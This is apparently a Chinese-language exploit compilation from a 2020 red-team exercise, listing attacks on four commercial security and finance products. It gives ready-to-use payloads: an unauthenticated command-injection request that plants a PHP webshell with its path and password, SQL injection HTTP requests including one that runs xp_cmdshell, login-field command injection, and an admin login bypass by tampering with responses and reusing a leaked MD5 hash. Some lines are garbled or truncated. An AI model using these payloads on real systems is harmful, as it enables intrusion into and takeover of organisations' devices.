2020护网中的漏洞信息安全资料.pdfVIP

一、齐治堡垒机前远程命令执行漏洞（CNVD-2019-20835）

1、访问1/listener/cluster_manage.php:返回OK.（未授权无需登录）

2、访问如下链接即可获得getshell，执行成功后，生成PHP一句话马

0/ha_request.php?action=installipaddr=1node_id=1${IFS}|`echo${IFS}ZWNobyAnPD9waHAgQGV2YWw

3.getshell访问路径：

/var/www/shterm/resources/qrcode/lbj77.php

0/shterm/resources/qrcode/lbj77.php(密码10086)

据说还是另外一个版本是java的:

POST/shterm/listener/tui_update.php

a=[t;importos;os.popen(whoami)#]

二、天融信TopApp-LB负载均衡系统Sql注入漏洞

1.利用POC:

POST/acc/clsf/report/datasource.phpHTTP/1.1

Host:localhost

Connection:close

Accept:text/javascript,text/html,application/xml,text/xml,*/*

User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_5)AppleWebKit/537.36(KHTML,likeGecko)Chrome/84.0.4147.105

Safari/537.36

Accept-Language:zh-CN,zh;q=0.9

Content-Type:application/x-www-form-urlencoded

t=le=0s=tl=1vid=1+unionselect1,2,3,4,5,6,7,8,9,substr(a,1,1),11,12,13,14,15,16,17,18,19,20,21,22--

+gid=0lmt=10o=r_Speedasc=falsep=8lipf=lipt=ripf=ript=dscp=proto=lpf=lpt=rpf=rpt=@。。

2.2个历史漏洞仍然可以复现。

/post/21626/

用户名随意密码：;id（天融信负载均衡TopApp-LB系统无需密码直接登陆）

/post/22193/

用户名:;ping9928;echo密码：任意

三、用友GRP-u8注入

利用POC:

POST/ProxyHTTP/1.1

Content-Type:application/x-www-form-urlencoded

User-Agent:Mozilla/4.0(compatible;MSIE6.0;)

Host:localhost

Content-Length:341

Connection:Keep-Alive

Cache-Control:no-cache

cVer=9.8.0dp=?xmlversion=1.0encoding=GB2312?R9PACKETversion=1DATAFORMATXML/DATAFORMAT

R9FUNCTIONNAMEAS_DataRequest/NAMEPARAMSPARAMNAMEProviderName/NAMEDATA

format=textDataSetProviderData/DATA/PARAMPARAMNAMEData/NAMEDATAformat=textexec

xp_cmdshellwhoami/DATA/PARAM/PARAMS/R9FUNCTION/R9PACKET

四、绿盟UTS综合威胁探针管理员任意登录

逻辑漏洞,利用方式参考：/archives/112.html

1、修改登录数据包{status:false,mag:}-{status:true,mag:}

2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码（md5）

3、再次登录,替换密码上个数据包中md5密码

4、登录成功

漏洞实际案例：

对响应包进行修改，将false更改为true的时候可以泄露管理用户的md5值密码

利用渠道的md5值去登录页面

7ac301836522b54afcbbed714534c